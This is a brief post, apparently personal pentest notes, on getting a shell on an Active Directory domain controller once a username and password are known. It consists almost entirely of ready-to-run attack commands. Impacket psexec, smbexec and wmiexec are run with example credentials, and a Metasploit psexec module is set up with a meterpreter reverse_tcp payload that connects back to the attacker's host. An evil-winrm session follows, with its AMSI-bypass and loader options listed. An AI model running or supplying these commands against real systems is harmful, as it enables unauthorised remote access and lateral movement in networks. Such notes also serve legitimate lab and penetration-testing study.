gaining shell access
posted on 13 Jul 2022 under category Active-Directory in series Active_Directory
this done when you get credential (user and pass)
# psexec.py DC/Username:Password@DC-IP
psexec.py Homelab.local/superman:'Password123!'@192.168.1.2
# smbexec.py DC/Username:Password@DC-IP
smbexec.py Homelab.local/superman:'Password123!'@192.168.1.2
# wmiexec.py DC/Username:Password@DC-IP
wmiexec.py Homelab.local/superman:'Password123!'@192.168.1.2
use exploit/windows/smb/psexec
set rhost #dc-ip
set smbdomain #dc-name
set smbpass # Userpass
set smbuser # Usarname
set Lhost # local-ip
set payload /windows/x64/meterpreter/reverse_tcp # payload
run # run exploit
#ruby evil-winrm.rb -i DC-IP -u Username -p Password
ruby evil-winrm.rb -i 192.168.1.2 -u superman -p 'Password123!'
[+] Dll-Loader
[+] Donut-Loader
[+] Invoke-Binary
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] menu
[+] exit